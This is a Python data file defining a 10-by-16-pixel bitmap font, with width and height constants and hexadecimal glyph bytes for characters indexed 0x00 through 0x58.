self.assertEqual(the_filter(test_value, '{hours2}'), '13')
self.assertEqual(the_filter(test_value, '{days}'), '12')
self.assertEqual(the_filter(test_value, '{days_total}'), '4027')
self.assertEqual(the_filter(test_value, '{years}'), '11')
self.assertEqual(the_filter(test_value, '{years_total}'), '11')
| 60.301508
| 89
| 0.66
| 1,466
| 12,000
| 5.116644
| 0.057981
| 0.201573
| 0.37435
| 0.499133
| 0.941608
| 0.914278
| 0.899213
| 0.820024
| 0.746834
| 0.722837
| 0
| 0.045595
| 0.162917
| 12,000
| 198
| 90
| 60.606061
| 0.701145
| 0
| 0
| 0.538043
| 0
| 0
| 0.163
| 0
| 0
| 0
| 0
| 0
| 0.847826
| 1
| 0.065217
| false
| 0
| 0.016304
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
cf2d96ca915be7706318f2a9bdabb28ec428dcd8
| 58
|
py
|
Python
|
locker/__init__.py
|
Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | 1
|
2017-09-13T07:16:35.000Z
|
2017-09-13T07:16:35.000Z
|
locker/__init__.py
|
Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | null | null | null |
locker/__init__.py
|
Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | null | null | null |
from .locker import Locker
from .locker import InvalidKey
| 19.333333
| 30
| 0.827586
| 8
| 58
| 6
| 0.5
| 0.416667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 31
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf76ef6118318fa5292cf9133490605b6fea26f3
| 137
|
py
|
Python
|
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
example/views/helpers.py
|
aholyoke/grasshopper
|
b9e11ac3aafdb6e2a61cc8a74ca67e36b690da69
|
[
"BSD-3-Clause"
] | null | null | null |
def read_template(template_dir, template_name):
with open("{}/{}".format(template_dir, template_name)) as f:
return f.read()
| 34.25
| 64
| 0.686131
| 19
| 137
| 4.684211
| 0.578947
| 0.247191
| 0.426966
| 0.516854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160584
| 137
| 3
| 65
| 45.666667
| 0.773913
| 0
| 0
| 0
| 0
| 0
| 0.036496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d84a871eefb08bf6d94055041e3d080ec2d9dd8f
| 17,707
|
py
|
Python
|
frozen/monaco16.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 45
|
2018-04-02T22:24:47.000Z
|
2022-03-27T14:34:06.000Z
|
frozen_modules/fonts/monaco16.py
|
lemariva/uPyEINK
|
8778239b9dfe32b0d4535db0045a7feb1c131d5c
|
[
"Apache-2.0"
] | 2
|
2018-09-19T09:39:20.000Z
|
2019-05-23T09:56:29.000Z
|
frozen/monaco16.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 16
|
2018-04-08T21:34:28.000Z
|
2022-03-18T16:00:38.000Z
|
width = const(10)
height = const(16)
data = [
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x00 (0)
0x00,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x01 (1)
0x00,0x00,0x36,0x00,0x36,0x00,0x36,0x00,0x36,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x02 (2)
0x00,0x00,0x11,0x00,0x11,0x00,0x11,0x00,0xff,0x80,0x22,0x00,0x22,0x00,0x22,0x00,0x22,0x00,0xff,0x80,0x44,0x00,0x44,0x00,0x44,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x03 (3)
0x08,0x00,0x3e,0x00,0x68,0x00,0x48,0x00,0x48,0x00,0x38,0x00,0x18,0x00,0x0e,0x00,0x0b,0x00,0x09,0x00,0x09,0x00,0x4a,0x00,0x3c,0x00,0x08,0x00,0x00,0x00,0x00,0x00, # Character 0x04 (4)
0x00,0x00,0x70,0x40,0x88,0x80,0x88,0x80,0x89,0x00,0x8a,0x00,0x74,0x00,0x0b,0x80,0x0c,0x40,0x14,0x40,0x24,0x40,0x44,0x40,0x83,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x05 (5)
0x00,0x00,0x38,0x00,0x44,0x00,0x44,0x00,0x4c,0x00,0x78,0x00,0x30,0x00,0x71,0x00,0x89,0x00,0x85,0x00,0x83,0x00,0x87,0x00,0x7c,0xc0,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x06 (6)
0x00,0x00,0x0e,0x00,0x0e,0x00,0x0e,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x07 (7)
0x03,0x00,0x0c,0x00,0x10,0x00,0x30,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x30,0x00,0x10,0x00,0x0c,0x00,0x03,0x00, # Character 0x08 (8)
0x60,0x00,0x18,0x00,0x04,0x00,0x06,0x00,0x02,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x06,0x00,0x04,0x00,0x18,0x00,0x60,0x00, # Character 0x09 (9)
0x08,0x00,0x08,0x00,0x6b,0x00,0x1c,0x00,0x1c,0x00,0x6b,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0a (10)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x7f,0xc0,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0b (11)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x1c,0x00,0x1c,0x00,0x04,0x00,0x08,0x00,0x10,0x00, # Character 0x0c (12)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0d (13)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0e (14)
0x00,0x80,0x00,0x80,0x01,0x00,0x02,0x00,0x02,0x00,0x04,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x0f (15)
0x00,0x00,0x1c,0x00,0x23,0x00,0x41,0x80,0x41,0x80,0x42,0x80,0x44,0x80,0x48,0x80,0x48,0x80,0x50,0x80,0x60,0x80,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x10 (16)
0x00,0x00,0x18,0x00,0x28,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x11 (17)
0x00,0x00,0x3f,0x00,0x40,0x80,0x00,0x80,0x00,0x80,0x01,0x00,0x06,0x00,0x0c,0x00,0x10,0x00,0x20,0x00,0x60,0x00,0x40,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x12 (18)
0x00,0x00,0x3c,0x00,0x43,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x80,0x00,0x80,0x00,0x80,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x13 (19)
0x00,0x00,0x02,0x00,0x06,0x00,0x0a,0x00,0x12,0x00,0x12,0x00,0x22,0x00,0x42,0x00,0x82,0x00,0xff,0xc0,0x02,0x00,0x02,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x14 (20)
0x00,0x00,0x7f,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x7c,0x00,0x03,0x00,0x00,0x80,0x00,0x80,0x00,0x80,0x00,0x80,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x15 (21)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0xc0,0x00,0x80,0x00,0x9e,0x00,0xa1,0x00,0xc0,0x80,0xc0,0x80,0x40,0x80,0x61,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x16 (22)
0x00,0x00,0x7f,0x80,0x00,0x80,0x01,0x00,0x03,0x00,0x04,0x00,0x04,0x00,0x08,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x17 (23)
0x00,0x00,0x1f,0x00,0x61,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x33,0x00,0x61,0x80,0x40,0x80,0x40,0x80,0x61,0x80,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x18 (24)
0x00,0x00,0x3e,0x00,0x43,0x00,0x81,0x00,0x81,0x80,0x81,0x80,0x42,0x80,0x3c,0x80,0x00,0x80,0x01,0x80,0x01,0x00,0x02,0x00,0x7c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x19 (25)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1a (26)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x1c,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x1c,0x00,0x1c,0x00,0x04,0x00,0x08,0x00,0x10,0x00, # Character 0x1b (27)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x01,0x80,0x06,0x00,0x18,0x00,0x60,0x00,0x18,0x00,0x06,0x00,0x01,0x80,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1c (28)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1d (29)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x30,0x00,0x0c,0x00,0x03,0x00,0x00,0xc0,0x03,0x00,0x0c,0x00,0x30,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1e (30)
0x00,0x00,0x3f,0x00,0x00,0x80,0x00,0x80,0x01,0x80,0x03,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x1f (31)
0x1e,0x00,0x21,0x00,0x40,0x80,0x9f,0x40,0xa1,0x40,0xa1,0x40,0xa1,0x40,0xa1,0x40,0x9f,0x80,0x80,0x00,0x40,0x00,0x22,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x20 (32)
0x00,0x00,0x08,0x00,0x1c,0x00,0x14,0x00,0x14,0x00,0x32,0x00,0x22,0x00,0x22,0x00,0x61,0x00,0x7f,0x00,0x41,0x00,0xc1,0x80,0x80,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x21 (33)
0x00,0x00,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x22 (34)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x23 (35)
0x00,0x00,0x7e,0x00,0x41,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x41,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x24 (36)
0x00,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x25 (37)
0x00,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x26 (38)
0x00,0x00,0x1f,0x80,0x20,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x41,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x20,0x80,0x1f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x27 (39)
0x00,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x7f,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x28 (40)
0x00,0x00,0x7f,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x29 (41)
0x00,0x00,0x1f,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x41,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2a (42)
0x00,0x00,0x41,0x00,0x42,0x00,0x44,0x00,0x48,0x00,0x50,0x00,0x60,0x00,0x50,0x00,0x48,0x00,0x44,0x00,0x42,0x00,0x41,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2b (43)
0x00,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2c (44)
0x00,0x00,0x41,0x00,0x63,0x00,0x63,0x00,0x63,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x4d,0x00,0x49,0x00,0x49,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2d (45)
0x00,0x00,0x40,0x80,0x60,0x80,0x60,0x80,0x50,0x80,0x50,0x80,0x48,0x80,0x44,0x80,0x44,0x80,0x42,0x80,0x43,0x80,0x41,0x80,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2e (46)
0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x2f (47)
0x00,0x00,0x7f,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x41,0x00,0x7e,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x30 (48)
0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x21,0x00,0x1e,0x00,0x04,0x00,0x04,0x00,0x03,0xc0, # Character 0x31 (49)
0x00,0x00,0x7e,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x44,0x00,0x42,0x00,0x41,0x00,0x41,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x32 (50)
0x00,0x00,0x1f,0x00,0x20,0x00,0x40,0x00,0x40,0x00,0x60,0x00,0x30,0x00,0x0c,0x00,0x03,0x00,0x00,0x80,0x00,0x80,0x01,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x33 (51)
0x00,0x00,0xff,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x34 (52)
0x00,0x00,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x40,0x80,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x35 (53)
0x00,0x00,0x80,0x80,0xc0,0x80,0x41,0x00,0x41,0x00,0x63,0x00,0x22,0x00,0x22,0x00,0x36,0x00,0x14,0x00,0x14,0x00,0x1c,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x36 (54)
0x00,0x00,0x88,0x80,0x88,0x80,0x88,0x80,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x77,0x00,0x63,0x00,0x22,0x00,0x22,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x37 (55)
0x00,0x00,0x21,0x00,0x22,0x00,0x12,0x00,0x14,0x00,0x0c,0x00,0x08,0x00,0x0c,0x00,0x14,0x00,0x22,0x00,0x22,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x38 (56)
0x00,0x00,0x40,0x40,0x20,0x80,0x20,0x80,0x11,0x00,0x0a,0x00,0x0a,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x39 (57)
0x00,0x00,0x7f,0x80,0x00,0x80,0x01,0x00,0x02,0x00,0x02,0x00,0x04,0x00,0x08,0x00,0x10,0x00,0x10,0x00,0x20,0x00,0x40,0x00,0x7f,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3a (58)
0x3f,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x3f,0x00, # Character 0x3b (59)
0x20,0x00,0x20,0x00,0x10,0x00,0x10,0x00,0x08,0x00,0x04,0x00,0x04,0x00,0x02,0x00,0x02,0x00,0x01,0x00,0x01,0x00,0x00,0x80,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3c (60)
0xfc,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0x04,0x00,0xfc,0x00, # Character 0x3d (61)
0x00,0x00,0x00,0x00,0x0c,0x00,0x0c,0x00,0x12,0x00,0x12,0x00,0x21,0x00,0x21,0x00,0x40,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x3e (62)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x80,0x00,0x00,0x00,0x00, # Character 0x3f (63)
0x08,0x00,0x04,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x40 (64)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1f,0x00,0x21,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x43,0x00,0x3d,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x41 (65)
0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x42 (66)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x00,0x21,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x20,0x00,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x43 (67)
0x00,0x80,0x00,0x80,0x00,0x80,0x00,0x80,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x44 (68)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x00,0x21,0x00,0x41,0x00,0x41,0x00,0x7f,0x00,0x40,0x00,0x40,0x00,0x21,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x45 (69)
0x03,0xc0,0x04,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x7f,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x46 (70)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x80,0x21,0x00,0x1e,0x00, # Character 0x47 (71)
0x40,0x00,0x40,0x00,0x40,0x00,0x40,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x48 (72)
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x49 (73)
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1f,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x01,0x00,0x02,0x00,0x3c,0x00, # Character 0x4a (74)
0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x21,0x00,0x22,0x00,0x24,0x00,0x28,0x00,0x30,0x00,0x28,0x00,0x24,0x00,0x22,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4b (75)
0x70,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x10,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4c (76)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb3,0x00,0xcc,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x88,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4d (77)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4e (78)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x22,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x22,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x4f (79)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5e,0x00,0x61,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x41,0x00,0x42,0x00,0x7c,0x00,0x40,0x00,0x40,0x00,0x40,0x00, # Character 0x50 (80)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0f,0x80,0x10,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x80,0x00,0x80,0x00,0x80, # Character 0x51 (81)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2f,0x80,0x30,0x80,0x20,0x80,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x52 (82)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x00,0x42,0x00,0x40,0x00,0x20,0x00,0x1c,0x00,0x02,0x00,0x01,0x00,0x41,0x00,0x3e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x53 (83)
0x00,0x00,0x00,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x3f,0x80,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x08,0x00,0x07,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x54 (84)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x20,0x80,0x21,0x80,0x1e,0x80,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x55 (85)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x40,0x40,0x40,0x20,0x80,0x20,0x80,0x11,0x00,0x11,0x00,0x0a,0x00,0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x56 (86)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x88,0x80,0x88,0x80,0x94,0x80,0x55,0x00,0x55,0x00,0x55,0x00,0x55,0x00,0x22,0x00,0x22,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x57 (87)
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x22,0x00,0x14,0x00,0x08,0x00,0x08,0x00,0x14,0x00,0x22,0x00,0x22,0x00,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00, # Character 0x58 (88)
